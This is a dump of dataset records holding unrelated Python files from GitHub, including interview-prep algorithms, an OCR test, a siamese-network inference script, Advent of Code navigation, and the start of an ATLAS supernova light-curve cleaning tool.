queue\n for adjIdx in self.nodes[rootIdx].adj:\n inboundEdgeCounts[adjIdx] -= 1\n assert inboundEdgeCounts[adjIdx] >= 0\n if inboundEdgeCounts[adjIdx] == 0:\n workQueue.append(adjIdx)\n\n if len(orderedList) > len(self.nodes):\n Exception(\"Logic error - ordered list has more nodes than graph\")\n\n if len(orderedList) < len(self.nodes):\n Exception(\"Ordered list has fewer nodes than graph = cycle!\")\n\n return orderedList\n\n def getInboundEdgeCounts(self):\n \"\"\"\n\n :return: Sequence of inbound edge counts. 
Each element in the sequence\n contains the inbound edge counts for the corresponding node in\n self.nodes.\n \"\"\"\n counts = [0] * len(self.nodes)\n\n for i, node in enumerate(self.nodes):\n for nodeIdx in node.adj:\n counts[nodeIdx] += 1\n\n return counts\n","repo_name":"vitaly-krugl/interview-prep","sub_path":"cracking_problems/toposort/toposort.py","file_name":"toposort.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20429518427","text":"class Solution:\n def findSmallestSetOfVertices(self, n: int, edges: List[List[int]]) -> List[int]:\n \n degrees = defaultdict(list)\n outDegree = set()\n inDegree = set()\n \n for edge in range(len(edges)):\n degrees[edges[edge][0]].append(edges[edge][1])\n \n for k,v in degrees.items():\n outDegree.add(k)\n for val in v:\n inDegree.add(val)\n \n common = outDegree.intersection(inDegree)\n answer = outDegree - common\n \n return list(answer)","repo_name":"ekramkedir2020/interview-prep","sub_path":"1557-minimum-number-of-vertices-to-reach-all-nodes/1557-minimum-number-of-vertices-to-reach-all-nodes.py","file_name":"1557-minimum-number-of-vertices-to-reach-all-nodes.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3720292906","text":"import re\n\ndef find_n_sort_monies():\n l = []\n n = 0\n r = open('test2','r')\n e = r.readlines()\n for x in e:\n if '9/9' in x:\n try:\n dol = re.search('(\\$\\d* | \\$\\s\\d*)', x)\n dol3 = int(dol.group().strip('$ '))\n dol4 = re.search('/\\w+/tix/\\w+',x)\n sec = re.search('Section\\s\\d*', x)\n #l.append([dol3,n,'http://sfbay.craigslist.org',sec.group()])\n #l.append([dol3,n,'http://sfbay.craigslist.org'+dol4.group()+'.html',sec.group()])\n l.append([dol3,n,'http://sfbay.craigslist.org'+dol4.group()+'.html'])\n n += 1\n except AttributeError:\n n += 1 \n t = (sorted(l))\n for u in t:\n print(u)\n print(len(t))\n \nif __name__=='__main__':\n find_n_sort_monies()\n \n","repo_name":"gittyhub/Scrapper_Giants_Tickets","sub_path":"Giantpack/find_date4.py","file_name":"find_date4.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16156897169","text":"import csv\n\ndef writeCsv(path, data):\n with open(path,\"w\", newline=\"\") as f:\n writer = csv.writer(f)\n for row in data:\n print(\"row =\", row)\n writer.writerow(row)\n\ndata = [[1,2,3],[1,2,3],[1,2,3] ]\npath = \"writer.csv\"\n\nwriteCsv(path,data)\n","repo_name":"rainbow520lxr/PythonStudy","sub_path":"Python编程思想/自动化办公/读写csv文件/写csv文件.py","file_name":"写csv文件.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27782278239","text":"# Given a rope of length n meters, cut the rope in different parts of integer lengths in a way that maximizes product of lengths of all parts. You must make at least one cut. 
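The findSmallestSetOfVertices solution above builds explicit out-degree and in-degree sets; for reference, the same answer falls out of the in-degrees alone (any vertex nobody points at must be in the result, and this form also covers isolated vertices). A standalone sketch, independent of the class above:

from typing import List

def find_smallest_set(n: int, edges: List[List[int]]) -> List[int]:
    # A vertex is reachable from another vertex iff it has an incoming edge,
    # so the minimal starting set is exactly the zero in-degree vertices.
    has_incoming = {dst for _, dst in edges}
    return [v for v in range(n) if v not in has_incoming]

assert find_smallest_set(3, [[0, 1], [0, 2]]) == [0]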
Assume that the length of rope is more than 2 meters.\n#https://www.geeksforgeeks.org/maximum-product-cutting-dp-36/\n\ndef max_product_from_cut_pieces(n):\n \"\"\"\n Args:\n n(int32)\n Returns:\n int64\n \"\"\"\n # Write your code here.\n table = [0] * (n+1)\n\n for i in range(1, n+1):\n largest_prod = 0\n for left_cut in range(1, i):\n right_cut = i - left_cut\n\n best_right_cut = table[right_cut]\n\n curr_prod = left_cut * max(right_cut, best_right_cut)\n\n largest_prod = max(largest_prod, curr_prod)\n\n table[i] = largest_prod\n\n return table[n]\n","repo_name":"n-gibs/dsa","sub_path":"dp/practice/cut_the_rope.py","file_name":"cut_the_rope.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26527471291","text":"# -*- coding: utf-8 -*-\n\"\"\"\n**************************************************************************************\n* Simple OCR\n* ===============\n* This program is intended to perform simple OCR in a given image/\n* MODULE: test_tesseract\n* Filename: test_tesseract.py\n* Version: 1.0.0 \n* Date: January 9, 2019\n* \n* Author: Aditya Kumar Singh\n* Team Name: Victorious Visionaries\n* Team Members: Aditya Kumar Singh, Raj Kumar Bhagat,\n* Ruphan S, Yash Patel\n***************************************************************************************\n\"\"\"\n\n#Importing required Libraries\n\ntry:\n from PIL import Image\nexcept ImportError:\n import Image\n\nimport os\nimport pytesseract\nimport cv2\n\n\"\"\"\n This program is just to test the OCR functionality.\n This will read an image and then tries to read text present in it.\n If found(any), then tthe text will be printed on the screen\n\"\"\"\ntext = cv2.imread('text.jpg')\ncv2.imshow('text',text)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\nprint(pytesseract.image_to_string(text))\n\n\"\"\"\nTo test the rotation detection functionality of the tesseract\n\"\"\"\ntest_images = ['test1_0.jpg', 'test1_90.jpg', 'test1_180.jpg', 'test_tilt.png']\nfor image in test_images:\n path = os.path.join('..\\\\Images', image)\n img = cv2.imread(path)\n cv2.imshow(image, img)\n print(image+' :', '\\n', pytesseract.image_to_osd(path), '\\n')\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"spider-tronix/portable-braille","sub_path":"Code/Old Codes/test_tesseract.py","file_name":"test_tesseract.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41100621613","text":"\nfrom dataclasses import dataclass\nfrom datetime import date\nfrom typing import List\n\n@dataclass\nclass Transaction:\n date : date\n type : str\n qty : float\n price : float\n cost : float\n\n@dataclass\nclass Saldo:\n date :date\n qty : float\n\ndef converter_em_class( arquivo_transactions): \n lista_trasanctions : List[Transaction]=[]\n\n for i in arquivo_transactions:\n transaction = Transaction(**i)\n lista_trasanctions.append(transaction)\n return lista_trasanctions\n\n\ndef pegar_saldo(lista_trasanctions):\n saldo =0\n lista_saldo = []\n\n if len(lista_trasanctions)>0:\n data_inicial = lista_trasanctions[0].date\n for transaction in lista_trasanctions:\n if transaction.date !=data_inicial:\n lista_saldo.append(Saldo( date = data_inicial, qty = saldo))\n\n data_inicial= transaction.date\n if transaction.type ==\"BUY\":\n saldo +=transaction.qty\n\n if transaction.type ==\"SELL\":\n saldo -= transaction.qty\n\n lista_saldo.append(Saldo(date = data_inicial, 
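A quick spot-check of max_product_from_cut_pieces above against hand-computed optima (the classic result is to cut into pieces of length 3 wherever possible, adjusting for the remainder):

for n, expected in [(2, 1), (3, 2), (4, 4), (5, 6), (10, 36)]:
    assert max_product_from_cut_pieces(n) == expected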
qty=saldo)) \n return lista_saldo ","repo_name":"samuelsacaia/TAcademy-Lista3","sub_path":"src/application/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35364344565","text":"import math\n\nfrom sympy import true\n\n\ndef locate_card(cards,query):\n # brute force\n position = 0\n while true:\n if cards[position] == query:\n return position\n position += 1\n if position == len(cards):\n return -1\n \n\n\n# cards = [13,11,10,9,7,4,3,2,1]\n# query = 7\n# output = 4\n\n# result = output\n\n# test = {\n# 'input':{\n# 'cards':[13,11,10,7,4,3,1,0],\n# 'query':7\n# },\n# 'output': 3\n# }\n\n# locate_card(**tests['input']) == test['output']\n# edge case\n# query is the first element\n# query is the last element\n# just one input\n# no query in the input\n# list of cards is empty\n# cards containing repeated numbers\n# number query occurs more than one position in cards\n\ntests = []\n\ntests.append({'input':{\n 'cards':[13,11,10,7,4,3,1,0],\n 'query':7\n },\n 'output': 3})\n\nresult = locate_card(tests['input']['cards'],tests['input']['query'])\nresult\n\nif result == tests['output']:\n print (True )\n\n","repo_name":"Prasannanatu/machinelearning","sub_path":"Softmax_Regression and Neural_Network/hw4/LeTsDoIt/algo1.py","file_name":"algo1.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6037824742","text":"from tksheet import Sheet\nimport tkinter as tk\n\napp = tk.Tk()\napp.grid_columnconfigure(0, weight = 1)\napp.grid_rowconfigure(0, weight = 1)\n\nmain_frame = tk.Frame(app)\nmain_frame.grid(row = 0, column = 0, sticky = \"nsew\", padx = 10, pady = 10)\n\nentry = tk.Entry(main_frame)\nentry.grid(row = 0, column = 0, sticky = \"ew\", padx = 10, pady = 10)\n\ncellValueFr = tk.Frame(main_frame)\ncellValueFr.grid(row = 1, column = 0, sticky = \"nw\", padx = 10, pady = 10)\n\nl = tk.Label(cellValueFr, text=\"fauihf fir huireh g\")\nl.grid(row = 0, column = 0, sticky = \"nw\")\n\nmain_frame.grid_columnconfigure(0, weight = 1)\nmain_frame.grid_rowconfigure(1, weight = 1)\n\nsheet = Sheet(main_frame,\n total_rows = 1200,\n total_columns = 30)\nsheet.grid(row = 2, column = 0, sticky = \"nswe\", padx = 10, pady = 10)\napp.mainloop()","repo_name":"longk15t/PythonTkinterApp","sub_path":"resizable.py","file_name":"resizable.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16764890973","text":"a = [3,3,2,4,1]\n\ndef fun(a):\n count = 0\n for i in range(len(a)):\n largest = a[0]\n seclargest = 0\n for j in range(1, len(a)):\n if a[j] >= largest:\n largest = a[j]\n print(largest)\n for k in range(len(a)):\n if a[k] < largest and a[k] != largest:\n if a[k]>=seclargest:\n seclargest = a[k]\n print(seclargest) \n diff = largest - seclargest\n print(diff)\n for l in range(len(a)):\n if a[l] == largest:\n a[l] = a[l] - diff\n count=count+1\n print(a) \n for i in range(1,len(a)):\n if a[i]==a[i-1]:\n if i == len(a) - 1:\n return count\n else:\n break \nprint(fun(a)) ","repo_name":"imanirudh1/coding_interview_questions","sub_path":"plies_of_boxes.py","file_name":"plies_of_boxes.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38066549090","text":"#write a function that 
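Two notes on the search exercise above: the harness at the bottom indexes tests['input'] although tests is a list, so running it as-is raises a TypeError (tests[0]['input'] is presumably intended), and since the problem statement says cards are sorted in decreasing order, a binary search finds the same index in O(log n). A hypothetical alternative to the linear scan, not part of the original file:

def locate_card_binary(cards, query):
    lo, hi = 0, len(cards) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        if cards[mid] == query:
            return mid
        elif cards[mid] < query:
            hi = mid - 1   # cards are descending, so larger values lie left
        else:
            lo = mid + 1
    return -1

assert locate_card_binary([13, 11, 10, 7, 4, 3, 1, 0], 7) == 3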
builds a dictionary describing album\ndef make_album(artist_name,album_title,number_track = 0):\n \"\"\"dictionary artist name and album title\"\"\"\n\n albums = {\n 'Artist':artist_name,\n 'Title':album_title,\n }\n if number_track:\n albums['Tracks'] = number_track\n \n return albums\n#call make_album\nalbum = make_album('David','praise',8)\nprint(album)\n\nwhile True:\n print(\"\\nPlease, enter album description\")\n print(\"enter 'q' to quit\")\n artist = input(\"Enter artist name: \")\n if artist == 'q':\n break\n title = input(\"Enter title of the album: \")\n if title == 'q':\n break\n track_no = input(\"How many tracks have? \")\n if track_no == 'q':\n break\n album = make_album(artist,title,track_no)\n print(album)\nprint(\"Thanks for response\")","repo_name":"Filaraya/Daily-Python-Exercise","sub_path":"make_album function.py","file_name":"make_album function.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71917798569","text":"import tensorflow as tf \nfrom tensorflow.python.framework import graph_util\nfrom tensorflow.python.platform import gfile\nimport cv2\nimport numpy as np\nfrom glob import glob \nimport os\n\nfrom siamese_net import siamese_loss, data_load\n\nfrom tools import eval_classfier\n\ndef inference(image_list, pb_path):\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n # sess = tf.Session()\n\n with gfile.FastGFile(pb_path, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='') # 导入计算图\n sess.run(tf.global_variables_initializer())\n\n input_1 = sess.graph.get_tensor_by_name('input_x1:0')\n \n output = sess.graph.get_tensor_by_name('siamese/output:0')\n\n output_image = sess.run(output, feed_dict={input_1:image_list})\n\n return output_image\n\nif __name__ == \"__main__\":\n import random\n \n pb_path = 'pb/siamese.ckpt-796-10.11599.pb'\n input_dir = ''\n input_dir_ok = ''\n batch_size = 9\n image_shape = 60\n thresh = 15\n data_1, label_1 = data_load(input_dir, image_shape)\n data_2, label_2 = data_load(input_dir_ok, image_shape)\n num_data_1 = len(label_1)\n num_data_2 = len(label_2)\n\n predict = []\n label = []\n\n batch_len = int(num_data_1 / batch_size)\n for idx in range(batch_len):\n \n batch_data_1 = data_1[idx*batch_size:(idx+1)*batch_size]\n batch_label_1 = label_1[idx*batch_size:(idx+1)*batch_size]\n\n ind_2 = random.sample(range(0, num_data_2), batch_size)\n batch_data_2 = data_2[ind_2]\n batch_label_2 = label_2[ind_2]\n\n batch_y = np.array(batch_label_1==batch_label_2, dtype=np.float32)\n output_1 = inference(batch_data_1, pb_path)\n output_2 = inference(batch_data_2, pb_path)\n\n diff = output_1 - output_2\n diff = np.sum(np.square(diff), 1)\n diff = np.sum(diff, 1)\n diff = np.sqrt(np.mean(diff, 1))\n \n pre = diff.copy()\n pre[diff>thresh] = 0\n pre[diff<=thresh] = 1\n predict.append(list(pre))\n label.append(list(batch_y))\n\n\n predict = np.squeeze(np.reshape(np.array(predict, np.int32), [1,-1]), 0)\n label = np.squeeze(np.reshape(np.array(label, np.int32), [1,-1]), 0)\n precision, recall, acc = eval_classfier(predict, 
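The distance computation in the siamese inference above reduces, for embeddings shaped (batch, h, w, c), to one Euclidean-style scalar per pair followed by thresholding. A condensed restatement of exactly those numpy steps (the function name and shapes are illustrative assumptions):

import numpy as np

def pair_predictions(emb1, emb2, thresh):
    sq = np.square(emb1 - emb2)                                   # (batch, h, w, c)
    dist = np.sqrt(np.mean(sq.sum(axis=1).sum(axis=1), axis=1))   # (batch,)
    return (dist <= thresh).astype(np.int32)                      # 1 = same, 0 = different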
label)\n","repo_name":"STONEKONG/siamese-tensorflow","sub_path":"inference_siamese.py","file_name":"inference_siamese.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"44033278400","text":"import os\nimport sys\nimport numpy as np\nimport pandas as pd\n\n\ndef function_1(X):\n numerator = np.power(np.sin(X[0] * np.pi * 2), 3) * np.sin(X[1] * np.pi * 2) \n denominator = np.power(X[0], 3) * (X[0] + X[1])\n\n return np.divide(numerator, denominator)\n\n\ndef f(X, constants):\n part_1 = constants[\"a\"] * np.power(X, 2)\n part_2 = constants[\"b\"] * X\n part_3 = constants[\"e\"] * np.sin(constants[\"f\"] * (constants[\"Pi_min\"] - X))\n\n return part_1 + part_2 + np.absolute(part_3) + constants[\"c\"]\n\n\ndef function2(X):\n df = pd.read_csv(os.path.join(sys.path[0], \"unidades_geradoras.csv\"))\n cost = 0 \n \n for i in range(40):\n constants = df.iloc[i]\n cost += f(X[i], constants)\n\n return cost","repo_name":"ufv-ciencia-da-computacao/tp02-ccf480","sub_path":"functions/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72280058088","text":"from typing import List\n\ndirectionMap = {0: [0,1], 1: [1,0], 2: [0, -1], 3: [-1,0]}\nweatherMap = {\"N\": [0,1], \"E\": [1,0], \"S\": [0, -1], \"W\": [-1,0]}\nrotateMap = {\"R\": [1, -1], \"L\": [-1, 1]}\n\ndef refinedManhattan(instructions: List[str]) -> int:\n xw,yw, xs, ys = 10, 1, 0,0\n for i in instructions:\n dir = i[0]\n dist = int(i[1:])\n if dir in weatherMap:\n xw, yw = xw + weatherMap[dir][0]*dist, yw + weatherMap[dir][1]*dist\n elif dir in rotateMap:\n for _ in range(dist // 90):\n oldX = xw\n xw = (rotateMap[dir][0]*(yw-ys)) + xs\n yw = (rotateMap[dir][1]*(oldX-xs)) + ys\n elif dir == \"F\":\n moveX, moveY = xw - xs, yw-ys\n xs,ys = xs + moveX*dist, ys + moveY*dist\n xw,yw = xw + moveX*dist, yw + moveY*dist\n\n return abs(xs) + abs(ys)\n\n\ndef getManhattanDistanceAfterInstructions(instructions: List[str]) -> int:\n x,y,direction = 0,0,1\n for i in instructions:\n dir = i[0]\n dist = int(i[1:])\n\n if dir in weatherMap:\n x, y = x + weatherMap[dir][0]*dist, y + weatherMap[dir][1]*dist\n elif dir in rotateMap:\n direction = (direction + rotateMap[dir][0]*dist // 90) % 4\n elif dir == \"F\":\n x,y = x + directionMap[direction][0]*dist, y + directionMap[direction][1]*dist\n\n return abs(x) + abs(y)\n\ndef main():\n inputSequence = [l.strip() for l in open(\"12.txt\").readlines()]\n print(f\"Part 1: {getManhattanDistanceAfterInstructions(inputSequence)}\")\n print(f\"Part 2: {refinedManhattan(inputSequence)}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Flourish3/AdventOfCode","sub_path":"2020/python/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36806389004","text":"#!/usr/bin/env python\n\"\"\"\n@author: Sofia Rest\n\"\"\"\n\nimport sys, argparse, configparser, re, os\nfrom copy import deepcopy\nimport pandas as pd\nimport numpy as np\n\nfrom pdastro import pdastrostatsclass, AandB, AnotB\nfrom atlas_lc import atlas_lc\nfrom plot_atlas_lc import plot_atlas_lc\nfrom asym_gaussian import gauss2lc\n\nclass clean_atlas_lc():\n\tdef __init__(self):\n\t\t# credentials\n\t\tself.tns_api_key = None\n\t\tself.tns_id = None\n\t\tself.bot_name = None\n\n\t\t# 
input/output\n\t\tself.output_dir = None\n\t\tself.snlist_filename = None\n\t\tself.snlist = None\n\t\tself.overwrite = True\n\t\tself.num_controls = 0\n\n\t\t# flags for each cut\n\t\tself.flags = {'chisquare':0x1,\n\n\t\t\t\t\t 'uncertainty':0x2,\n\n\t\t\t\t\t 'controls_bad':0x400000,\n\t\t\t\t\t 'controls_questionable':0x80000,\n\t\t\t\t\t 'controls_x2':0x100,\n\t\t\t\t\t 'controls_stn':0x200,\n\t\t\t\t\t 'controls_Nclip':0x400,\n\t\t\t\t\t 'controls_Ngood':0x800,\n\n\t\t\t\t\t 'avg_badday':0x800000,\n\t\t\t\t\t 'avg_ixclip':0x1000,\n\t\t\t\t\t 'avg_smallnum':0x2000}\n\n\t\t# uncertainty cut\n\t\tself.uncertainties = False \n\t\tself.uncertainty_cut = None\n\n\t\t# estimating true uncertainties\n\t\tself.estimate_true_uncertainties = False\n\t\tself.estimate_true_uncertainties_chisquare_cut = None\n\n\t\t# chi-square cut\n\t\tself.chisquares = False\n\t\tself.chisquare_cut = None \n\t\tself.stn_bound = None\n\t\tself.min_cut = None\n\t\tself.max_cut = None\n\t\tself.cut_step = None\n\t\tself.contam_lim = None\n\t\tself.loss_lim = None\n\t\tself.lim_to_prioritize = None\n\n\t\t# control light curve cut\n\t\tself.controls = False\n\t\tself.c_x2_max = None\n\t\tself.stn_max = None\n\t\tself.c_Nclip_max = None\n\t\tself.c_Ngood_min = None\n\n\t\t# averaging\n\t\tself.mjd_bin_size = None\n\t\tself.keep_empty_bins = False\n\t\tself.flux2mag_sigmalimit = None\n\t\tself.g_Nclip_max = None\n\t\tself.g_Ngood_min = None \n\t\tself.g_x2_max = None\n\n\t\t# detecting pre-SN bumps\n\t\tself.detect_bumps = False\n\t\tself.gaussian_sigma = None\n\t\tself.appmags = None\n\t\tself.start_mjd = None\n\t\tself.end_mjd = None\n\t\n\t# define command line arguments\n\tdef define_args(self, parser=None, usage=None, conflict_handler='resolve'):\n\t\tif parser is None:\n\t\t\tparser = argparse.ArgumentParser(usage=usage,conflict_handler=conflict_handler)\n\t\t\n\t\tparser.add_argument('tnsnames', nargs='+', help='TNS names of the objects to download from ATLAS')\n\t\t\n\t\tparser.add_argument('-x', '--chisquares', default=False, action='store_true', help='apply chi-square cut')\n\t\tparser.add_argument('-u', '--uncertainties', default=False, action='store_true', help='apply uncertainty cut')\n\t\tparser.add_argument('-c', '--controls', default=False, action='store_true', help='apply control light curve cut')\n\t\t\n\t\tparser.add_argument('-g', '--average', default=False, action='store_true', help='average light curves and cut bad days')\n\t\tparser.add_argument('-m', '--mjd_bin_size', type=float, default=None, help='MJD bin size in days for averaging')\n\n\t\tparser.add_argument('-b', '--detect_bumps', default=False, action='store_true', help='apply rolling gaussian weighted sum to flux/dflux in order to amplify possible precursor bumps')\n\t\tparser.add_argument('--sim_gaussian', nargs=3, default=None, help=('comma-separated peakMJD list, peak_appmag, gaussian_sigma: add a gaussian at peakMJD with a peak apparent magnitude of peak_appmag and a sigma of gaussian_sigma in days'))\n\n\t\tparser.add_argument('-p', '--plot', default=False, action='store_true', help='plot each cut and save into PDF file')\n\t\tparser.add_argument('--xlim_lower', type=float, default=None, help='if plotting, manually set lower x axis limit to a certain MJD')\n\t\tparser.add_argument('--xlim_upper', type=float, default=None, help='if plotting, manually set upper x axis limit to a certain MJD')\n\t\tparser.add_argument('--ylim_lower', type=float, default=None, help='if plotting, manually set lower y axis limit to a certain 
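The cut bookkeeping above packs every cut decision into a single integer "Mask" column using the bit flags defined in self.flags; a tiny standalone demonstration of how such flags are set, combined, and tested:

flags = {'chisquare': 0x1, 'uncertainty': 0x2, 'controls_bad': 0x400000}
mask = 0
mask |= flags['chisquare'] | flags['uncertainty']   # flag one measurement twice
assert mask & flags['chisquare']                    # chi-square cut applied
assert not (mask & flags['controls_bad'])           # control-curve cut not applied
assert mask == 0x3                                  # each cut stays an independent bit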
uJy')\n\t\tparser.add_argument('--ylim_upper', type=float, default=None, help='if plotting, manually set upper y axis limit to a certain uJy')\n\n\t\tparser.add_argument('--skip_tc', default=False, action='store_true', help='skip correction for ATLAS template changes')\n\t\tparser.add_argument('-f','--cfg_filename', default='params.ini', type=str, help='file name of ini file with settings for this class')\n\t\tparser.add_argument('--dont_overwrite', default=False, action='store_true', help='don\\'t overwrite existing file with same file name')\n\t\tparser.add_argument('-a','--tns_api_key', type=str, help='api key to access TNS')\n\t\t\n\t\treturn parser\n\n\t# load config settings from file and reconcile with command arguments\n\tdef load_settings(self, args):\n\t\tprint('LOADING SETTINGS FROM CONFIG FILE AND CMD ARGUMENTS...')\n\n\t\tcfg = configparser.ConfigParser()\n\t\ttry:\n\t\t\tprint(f'Loading config file at {args.cfg_filename}')\n\t\t\tcfg.read(args.cfg_filename)\n\t\texcept Exception as e:\n\t\t\traise RuntimeError(f'ERROR: Could not load config file at {args.cfg_filename}!')\n\n\t\tself.tns_api_key = cfg['TNS credentials']['api_key'] if args.tns_api_key is None else args.tns_api_key\n\t\tself.tns_id = cfg['TNS credentials']['tns_id']\n\t\tself.bot_name = cfg['TNS credentials']['bot_name']\n\t\tself.output_dir = cfg['Input/output settings']['output_dir']\n\t\tprint(f'Light curve .txt files output directory: {self.output_dir}')\n\n\t\t# attempt to load snlist.txt; if does not exist, create new snlist table\n\t\tself.snlist_filename = cfg['Input/output settings']['snlist_filename']\n\t\tif os.path.exists(self.snlist_filename):\n\t\t\tself.snlist = pdastrostatsclass()\n\t\t\tself.snlist.load_spacesep(f'{self.output_dir}/{self.snlist_filename}', delim_whitespace=True)\n\t\telse:\n\t\t\tself.snlist = pdastrostatsclass(columns=['tnsname', 'ra', 'dec', 'discovery_date', 'closebright_ra', 'closebright_dec'])\n\n\t\tself.overwrite = not args.dont_overwrite\n\t\tprint(f'Overwrite existing light curve files: {self.overwrite}')\n\t\tself.num_controls = int(cfg['Control light curve settings']['num_controls'])\n\t\tprint(f'Number of control light curves: {self.num_controls}')\n\t\tself.plot = bool(args.plot)\n\t\tprint(f'Plotting: {self.plot}')\n\t\tself.skip_tc = bool(args.skip_tc)\n\t\tif self.skip_tc:\n\t\t\tprint(f'Skipping correction for ATLAS template changes: {self.skip_tc}')\n\n\t\tself.estimate_true_uncertainties = cfg['True uncertainties estimation settings']['estimate_true_uncertainties']=='True'\n\t\tself.estimate_true_uncertainties_chisquare_cut = float(cfg['True uncertainties estimation settings']['estimate_true_uncertainties_chisquare_cut'])\n\t\tif self.estimate_true_uncertainties:\n\t\t\tprint(f'Estimating true uncertainties set to {self.estimate_true_uncertainties} with preliminary chi-square cut at {self.estimate_true_uncertainties_chisquare_cut:0.2f}')\n\n\t\tself.chisquares = args.chisquares\n\t\tif self.chisquares:\n\t\t\tprint(f'\\nChi-square cut: {self.chisquares}')\n\t\t\ttry:\n\t\t\t\tself.chisquare_cut = float(cfg['Chi-square cut settings']['override_cut'])\n\t\t\t\tprint(f'# Overriding dynamic chi-square cut with manual cut of x2 = {self.chisquare_cut}')\n\t\t\texcept:\n\t\t\t\tself.stn_bound = float(cfg['Chi-square cut settings']['stn_bound'])\n\t\t\t\tself.min_cut = int(cfg['Chi-square cut settings']['min_cut'])\n\t\t\t\tself.max_cut = int(cfg['Chi-square cut settings']['max_cut'])\n\t\t\t\tself.cut_step = int(cfg['Chi-square cut 
settings']['cut_step'])\n\t\t\t\tself.contam_lim = float(cfg['Chi-square cut settings']['contamination_limit'])\n\t\t\t\tself.loss_lim = float(cfg['Chi-square cut settings']['loss_limit'])\n\t\t\t\tself.lim_to_prioritize = cfg['Chi-square cut settings']['limit_to_prioritize']\n\t\t\t\tif not(self.lim_to_prioritize == 'loss' or self.lim_to_prioritize == 'contamination'):\n\t\t\t\t\traise RuntimeError(f'ERROR: Limit to prioritize (limit_to_prioritize in config file) must be set to \\'contamination\\' or \\'loss\\' but currently set to {self.lim_to_prioritize}!')\n\t\t\t\tprint(f'# abs(flux/dflux) bound that determines a \"good\" measurement vs. \"bad\" measurement: {self.stn_bound}')\n\t\t\t\tprint(f'# Cut range: [{self.min_cut}, {self.max_cut}], both ends inclusive, with step size {self.cut_step}')\n\t\t\t\tprint(f'# Contamination percent limit: {self.contam_lim}')\n\t\t\t\tprint(f'# Loss percent limit: {self.loss_lim}')\n\t\t\t\tprint(f'# Limit to prioritize: {self.lim_to_prioritize}')\n\n\t\tself.uncertainties = args.uncertainties\n\t\tif self.uncertainties:\n\t\t\tprint(f'\\nUncertainty cut: {self.uncertainties}')\n\t\t\tself.uncertainty_cut = float(cfg['Uncertainty cut settings']['cut'])\n\t\t\tprint(f'# Set to cut at dflux = {self.uncertainty_cut}')\n\n\t\tself.controls = args.controls\n\t\tif self.controls:\n\t\t\tprint(f'\\nControl light curve cut: {self.controls}')\n\t\t\tself.c_x2_max = float(cfg['Control light curve cut settings']['x2_max'])\n\t\t\tself.stn_max = float(cfg['Control light curve cut settings']['stn_max'])\n\t\t\tself.c_Nclip_max = int(cfg['Control light curve cut settings']['Nclip_max'])\n\t\t\tself.c_Ngood_min = int(cfg['Control light curve cut settings']['Ngood_min'])\n\t\t\tprint(f'# Bound for an epoch\\'s maximum chi-square: {self.c_x2_max}')\n\t\t\tprint(f'# Bound for an epoch\\'s maximum abs(flux/dflux) ratio: {self.stn_max}')\n\t\t\tprint(f'# Bound for an epoch\\'s maximum number of clipped control measurements: {self.c_Nclip_max}')\n\t\t\tprint(f'# Bound for an epoch\\'s minimum number of good control measurements: {self.c_Ngood_min}')\n\n\t\tself.averaging = args.average \n\t\tif self.averaging:\n\t\t\tprint(f'\\nAveraging and cutting bad days: {self.averaging}')\n\t\t\tself.flux2mag_sigmalimit = int(cfg['Input/output settings']['flux2mag_sigmalimit'])\n\t\t\tprint(f'# Sigma limit when converting flux to magnitude (magnitudes are limits when dmagnitudes are NaN): {self.flux2mag_sigmalimit}')\n\t\t\tself.mjd_bin_size = args.mjd_bin_size if not(args.mjd_bin_size is None) else float(cfg['Averaging settings']['mjd_bin_size'])\n\t\t\tprint(f'# MJD bin size: {self.mjd_bin_size} days')\n\t\t\tself.keep_empty_bins = cfg['Averaging settings']['keep_empty_bins']=='True'\n\t\t\tprint(f'# Keep empty bins and store as NaN in averaged light curve: {self.keep_empty_bins}')\n\t\t\t\n\t\t\tself.g_Nclip_max = int(cfg['Averaging settings']['Nclip_max'])\n\t\t\tself.g_Ngood_min = int(cfg['Averaging settings']['Ngood_min'])\n\t\t\tself.g_x2_max = float(cfg['Averaging settings']['x2_max'])\n\t\t\tprint(f'# MJD bin bounds for not flagging as bad day: 